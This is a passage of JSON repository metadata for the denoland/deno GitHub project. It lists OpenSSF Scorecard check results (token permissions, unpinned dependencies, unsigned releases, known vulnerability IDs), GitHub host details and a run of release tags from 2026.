merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/